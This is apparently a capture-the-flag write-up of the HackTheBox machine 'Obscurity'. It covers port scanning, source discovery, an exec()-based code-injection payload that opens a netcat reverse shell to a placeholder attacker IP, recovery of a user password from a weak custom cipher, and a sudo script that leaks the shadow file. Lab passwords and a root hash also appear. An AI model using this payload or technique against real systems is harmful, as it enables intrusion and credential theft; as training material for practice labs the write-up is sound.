Summary

Obscurity,a Linux box created by HackTheBox user clubby789, was an overall medium difficulty box. Initial foothold was finding the code for the webserver code and analyze it to figure out RCE. which get us low privilege shell. In User directory there is a python encryption script we can use to figure out users password. As user we can run a python script meant to replace SSH that we can use to gain access to roots password hash. using which we get Root.

Initial Scan

nmap

# Nmap 7.80 scan initiated Sat Nov 30 15:01:37 2019 as: nmap -sC -sV -oN nmap/obscurity 10.10.10.168
Nmap scan report for 10.10.10.168
Host is up (0.14s latency).
Not shown: 996 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 33:d3:9a:0d:97:2c:54:20:e1:b0:17:34:f4:ca:70:1b (RSA)
|   256 f6:8b:d5:73:97:be:52:cb:12:ea:8b:02:7c:34:a3:d7 (ECDSA)
|_  256 e8:df:55:78:76:85:4b:7b:dc:70:6a:fc:40:cc:ac:9b (ED25519)
80/tcp   closed http
8080/tcp open   http-proxy BadHTTPServer
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Sat, 30 Nov 2019 20:01:50
|     Server: BadHTTPServer
|     Last-Modified: Sat, 30 Nov 2019 20:01:50
|     Content-Length: 4171
|     Content-Type: text/html
|     Connection: Closed
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>0bscura</title>
|     <meta http-equiv="X-UA-Compatible" content="IE=Edge">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta name="keywords" content="">
|     <meta name="description" content="">
|     <!--
|     Easy Profile Template
|     http://www.templatemo.com/tm-467-easy-profile
|     <!-- stylesheet css -->
|     <link rel="stylesheet" href="css/bootstrap.min.css">
|     <link rel="stylesheet" href="css/font-awesome.min.css">
|     <link rel="stylesheet" href="css/templatemo-blue.css">
|     </head>
|     <body data-spy="scroll" data-target=".navbar-collapse">
|     <!-- preloader section -->
|     <!--
|     <div class="preloader">
|     <div class="sk-spinner sk-spinner-wordpress">
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Sat, 30 Nov 2019 20:01:51
|     Server: BadHTTPServer
|     Last-Modified: Sat, 30 Nov 2019 20:01:51
|     Content-Length: 4171
|     Content-Type: text/html
|     Connection: Closed
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>0bscura</title>
|     <meta http-equiv="X-UA-Compatible" content="IE=Edge">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta name="keywords" content="">
|     <meta name="description" content="">
|     <!--
|     Easy Profile Template
|     http://www.templatemo.com/tm-467-easy-profile
|     <!-- stylesheet css -->
|     <link rel="stylesheet" href="css/bootstrap.min.css">
|     <link rel="stylesheet" href="css/font-awesome.min.css">
|     <link rel="stylesheet" href="css/templatemo-blue.css">
|     </head>
|     <body data-spy="scroll" data-target=".navbar-collapse">
|     <!-- preloader section -->
|     <!--
|     <div class="preloader">
|_    <div class="sk-spinner sk-spinner-wordpress">
|_http-server-header: BadHTTPServer
|_http-title: 0bscura
9000/tcp closed cslistener
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.80%I=7%D=11/30%Time=5DE2CAB0%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,10FC,"HTTP/1\.1\x20200\x20OK\nDate:\x20Sat,\x2030\x20Nov\x202
SF:019\x2020:01:50\nServer:\x20BadHTTPServer\nLast-Modified:\x20Sat,\x2030
SF:\x20Nov\x202019\x2020:01:50\nContent-Length:\x204171\nContent-Type:\x20
SF:text/html\nConnection:\x20Closed\n\n<!DOCTYPE\x20html>\n<html\x20lang=\
SF:"en\">\n<head>\n\t<meta\x20charset=\"utf-8\">\n\t<title>0bscura</title>
SF:\n\t<meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE=Edge\">\n\t
SF:<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-
SF:scale=1\">\n\t<meta\x20name=\"keywords\"\x20content=\"\">\n\t<meta\x20n
SF:ame=\"description\"\x20content=\"\">\n<!--\x20\nEasy\x20Profile\x20Temp
SF:late\nhttp://www\.templatemo\.com/tm-467-easy-profile\n-->\n\t<!--\x20s
SF:tylesheet\x20css\x20-->\n\t<link\x20rel=\"stylesheet\"\x20href=\"css/bo
SF:otstrap\.min\.css\">\n\t<link\x20rel=\"stylesheet\"\x20href=\"css/font-
SF:awesome\.min\.css\">\n\t<link\x20rel=\"stylesheet\"\x20href=\"css/templ
SF:atemo-blue\.css\">\n</head>\n<body\x20data-spy=\"scroll\"\x20data-targe
SF:t=\"\.navbar-collapse\">\n\n<!--\x20preloader\x20section\x20-->\n<!--\n
SF:<div\x20class=\"preloader\">\n\t<div\x20class=\"sk-spinner\x20sk-spinne
SF:r-wordpress\">\n")%r(HTTPOptions,10FC,"HTTP/1\.1\x20200\x20OK\nDate:\x2
SF:0Sat,\x2030\x20Nov\x202019\x2020:01:51\nServer:\x20BadHTTPServer\nLast-
SF:Modified:\x20Sat,\x2030\x20Nov\x202019\x2020:01:51\nContent-Length:\x20
SF:4171\nContent-Type:\x20text/html\nConnection:\x20Closed\n\n<!DOCTYPE\x2
SF:0html>\n<html\x20lang=\"en\">\n<head>\n\t<meta\x20charset=\"utf-8\">\n\
SF:t<title>0bscura</title>\n\t<meta\x20http-equiv=\"X-UA-Compatible\"\x20c
SF:ontent=\"IE=Edge\">\n\t<meta\x20name=\"viewport\"\x20content=\"width=de
SF:vice-width,\x20initial-scale=1\">\n\t<meta\x20name=\"keywords\"\x20cont
SF:ent=\"\">\n\t<meta\x20name=\"description\"\x20content=\"\">\n<!--\x20\n
SF:Easy\x20Profile\x20Template\nhttp://www\.templatemo\.com/tm-467-easy-pr
SF:ofile\n-->\n\t<!--\x20stylesheet\x20css\x20-->\n\t<link\x20rel=\"styles
SF:heet\"\x20href=\"css/bootstrap\.min\.css\">\n\t<link\x20rel=\"styleshee
SF:t\"\x20href=\"css/font-awesome\.min\.css\">\n\t<link\x20rel=\"styleshee
SF:t\"\x20href=\"css/templatemo-blue\.css\">\n</head>\n<body\x20data-spy=\
SF:"scroll\"\x20data-target=\"\.navbar-collapse\">\n\n<!--\x20preloader\x2
SF:0section\x20-->\n<!--\n<div\x20class=\"preloader\">\n\t<div\x20class=\"
SF:sk-spinner\x20sk-spinner-wordpress\">\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 30 15:02:14 2019 -- 1 IP address (1 host up) scanned in 37.66 seconds

If we navigate to the website on port 8080 we see a web-page for a company with a rather intresting take on security.
We read something interesting, at the bottom we see

Message to server devs:the current source code for the webserver is in 'SuperSecureServer.py' in the secret development directory.

So we can run wfuzz to find the code.

wfuzz -c -w /usr/share/wordlists/dirb/small.txt 10.10.10.168:8080/FUZZ/SuperSecureServer.py

which reveal the code is in develop directory.

Getting the code and analyzing it

info = "output = 'Document: {}'" # Keep the output for later debug
exec(info.format(path)) # This is how you do string formatting, right?

Since we control over the path we can use that to get exec() to run code we want.

so we can execute payload with

10.10.10.168:8080/'; os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.X.X 9000 >/tmp/f");a='a

which give us a shell as www-data
checking robert home directory we find SuperSecureCrypt.py and we find a encrypted file for robert password and a test encrypted and plaintextfile using

using the plain and the sample encrypted file we get the key

utfenc ="¦ÚÈêÚÞØÛÝ݉×ÐÊ߅ÞÊÚɒæßÝˈÚÛÚêÙÉëéÑÒÝÍЅêÆáÙÞã–ÒшÐáÙ¦Õæ؞ãÊÎ́ßÚêƎÝáäè‰ÎÍڌÎëÑÓäáÛÌ׉v"
decrypted = decrypt(utfenc,"Encrypting this file with your key should result in out.txt, make sure your key is correct!")
print(decrypted)

which reveal the key as alexandrovich and decrypting the passwordreminder.txt we get the pasword as SecThruOBsFTW

which give us user and we can read user.txt

Privilege Escalation

So now that we are user we see that there is BetterSSH.py in /home/robert/BetterSSH/ .

checking sudo -l shows

User robert may run the following commands on obscure:
  (ALL) NOPASSWD: /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py

For some reason the scripts copies the output of the shadow file to a random file in /tmp/SSH.

so open two terminal session and run

while True;do cat /tmp/SSH/* done

in one of the session

and run sudo /home/robert/BetterSSH/BetterSSH.py and Enter Username as test and password as test which give invalid password.

but in the first terminal we see the content of shadow file so we can grab root password hash as

$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1

We can crack the hash using john the ripper and the rockyou.txt which give us the password as
mercedes

so we can ssh to the box with root:mercedes and can grab root.txt

root@obscure:~# id;hostname;cut -c 1-15 /root/root.txt
uid=0(root) gid=0(root) group=0(root)
obscure
512fd4429f33a11

and we have pwned Obscurity 💃